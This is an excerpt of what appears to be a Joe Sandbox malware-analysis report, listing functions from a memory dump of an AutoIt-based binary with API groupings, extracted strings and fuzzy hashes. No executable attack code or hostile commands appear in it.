                                                                                                                                                                                                                    • Instruction ID: abd0ea3a66cc33cdeca854e8201239847a3bc74d5954a2908508f4a88857ff63
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12616F72B146418BE718CF6AE84466D77A2B788B84F148639DE0AE3F58DF3DD945CB00
                                                                                                                                                                                                                    Function 00007FF656D34708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                    • API String ID: 1561581874-1000479233
                                                                                                                                                                                                                    • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                                                                                                                                    • Instruction ID: 885fddab7bcae11c86ea17b06f5a9b57c2a93365b912094ab270337d0d408938
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CD1E422F0969681EA609F15D54017D63A1FF58BE8F484B32DA5EA37E4DF3EE945C300
                                                                                                                                                                                                                    Function 00007FF656D1FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                                                                    • String ID: %s%u
                                                                                                                                                                                                                    • API String ID: 1412819556-679674701
                                                                                                                                                                                                                    • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                                                                                                                    • Instruction ID: 4865e42a05d773ccc0ce6237c4a4cbf137504bd02be791a6cdfe87dcb7e5614c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AB1D172B0868296EB28CB25D844AF977A0FF45B84F480A31CE1EA7795DF3EE555C700
                                                                                                                                                                                                                    Function 00007FF656D2176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                    • API String ID: 4010642439-1241985126
                                                                                                                                                                                                                    • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                                                                                                                    • Instruction ID: 65f49733133c9614017b7284c5eb3ce35de66c14a6b1afcb36b3a7c61bea5ef8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05A1D822B0868643EB249F15DC447BDA761FF85784F488735CB8EA3A95DE3EE945CB00
                                                                                                                                                                                                                    Function 00007FF656CB1504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1268354404-3110715001
                                                                                                                                                                                                                    • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                                                                                                                    • Instruction ID: 759116b676916709df26b5991c55acdbc7c83e5ed4f19cacc44001f2010986cb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79619176A086428AEF54DF25D84067937A0FB84BD8F584A35DD0EA7BA4DF3EE444C700
                                                                                                                                                                                                                    Function 00007FF656D334E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                    • API String ID: 3297454147-2391861430
                                                                                                                                                                                                                    • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                                                                                                                    • Instruction ID: 53495b4095a08e281ff685e10801c9ef7ffb93a4ae507bdf64aca0ad5f5f36a8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6971B771F18A8296EB40DB65E8504ED6330FF44784F881632EE4EA76A9DF7EE506C740
                                                                                                                                                                                                                    Function 00007FF656D1C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                    • API String ID: 3030280669-22481851
                                                                                                                                                                                                                    • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                                                                                                                    • Instruction ID: 68c70a5bad7937a496092a756f1ccff76bf2aa684cd8c67bcbfa674fcf0e220c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F51E562B18A8285EB10DB65E8902ED77B0FB843C4F841231EE4DA7A79DF3DD185C700
                                                                                                                                                                                                                    Function 00007FF656D5AD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    • API String ID: 3821898125-2160076837
                                                                                                                                                                                                                    • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                                                                                                                    • Instruction ID: 6c8b7e41ae503baf80d2ed6a20ce0944f36caad7dd6147e6f3a735a63cbe8ddf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC415A326087818BEB708F25E444B5AB3A1FB89790F584735DA9D97B98CF3ED485CB00
                                                                                                                                                                                                                    Function 00007FF656D33E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                                                                                                                    • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                                                                                                                    • Instruction ID: 6cc4852d6dac21ded4908fba4422e8bbfc1d49f4e91d253bee6a12cfe99ac580
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C41B022A086C385E7209F25E9046FD73A0FF85798F480735DA0DA7AA8DF7DD686C700
                                                                                                                                                                                                                    Function 00007FF656D1C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1255039815-0
                                                                                                                                                                                                                    • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                                                                                                                    • Instruction ID: 9414f7a9c3745f655f8113f70ed8552a0b5c94d019eaf83e55adce82e4672ce7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84618E22F046568AEB10DFA2D8445AC37B4FB44B88B489B36DE0EA3795DF7ED945C340
                                                                                                                                                                                                                    Function 00007FF656D27BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                    • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                                                                                                                    • Instruction ID: 256a9521991e0ecff535be0eab628ded5352ba190c352dd3c124fd4af135e5b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE418521E0C6C196FBB19B70DC007793AA0EB55B84F4C4B39D78AA35C2CE5FA894D361
                                                                                                                                                                                                                    Function 00007FF656CBE774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB6838: CreateFileW.KERNELBASE ref: 00007FF656CB68A2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD4380: GetCurrentDirectoryW.KERNEL32(?,00007FF656CBE817), ref: 00007FF656CD439C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB56D4: GetFullPathNameW.KERNEL32(?,00007FF656CB56C1,?,00007FF656CB7A0C,?,?,?,00007FF656CB109E), ref: 00007FF656CB56FF
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF656CBE8B0
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF656CBE9FA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                    • API String ID: 2207129308-1018226102
                                                                                                                                                                                                                    • Opcode ID: e666b89966b71e961a6c376cb8cbf9f525aba3ba80c6ab6ab509b9189c1ad3dd
                                                                                                                                                                                                                    • Instruction ID: 8aebf03f51a4d5ba8e3320bff497e2f2bc4d101ae9a8c0621c0b3d03b189389e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e666b89966b71e961a6c376cb8cbf9f525aba3ba80c6ab6ab509b9189c1ad3dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA12F772A0C68285EB50EB61D4401FE7770FB85794F880632EA8EA77AADF7ED545C700
                                                                                                                                                                                                                    Function 00007FF656D466B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                    • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                                                                                                                    • Instruction ID: b66b638578b92835b62d927c3ed7550388c1402a8fd4a018ccdfadcd4eb71f0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA717222A08A8681EB149F26D4401BD3770FB45B99F484B31DE4EA77A5DFBFE885C340
                                                                                                                                                                                                                    Function 00007FF656D42A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                                                                                                                                                    • String ID: 5$Ping
                                                                                                                                                                                                                    • API String ID: 1486594354-1972892582
                                                                                                                                                                                                                    • Opcode ID: c9c6d74eaa504c246764e5ffca37d73b918c288db5681ab91a08afc3986fad77
                                                                                                                                                                                                                    • Instruction ID: 1151e683e44daf12a706c5e4aa342abda204fc70d59c8294988b7ffbc8cd3a30
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9c6d74eaa504c246764e5ffca37d73b918c288db5681ab91a08afc3986fad77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC717062A0864286EB20DF16D48437D7760FF84B91F498A31DA9DD77A5CFBED941CB00
                                                                                                                                                                                                                    Function 00007FF656CED504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
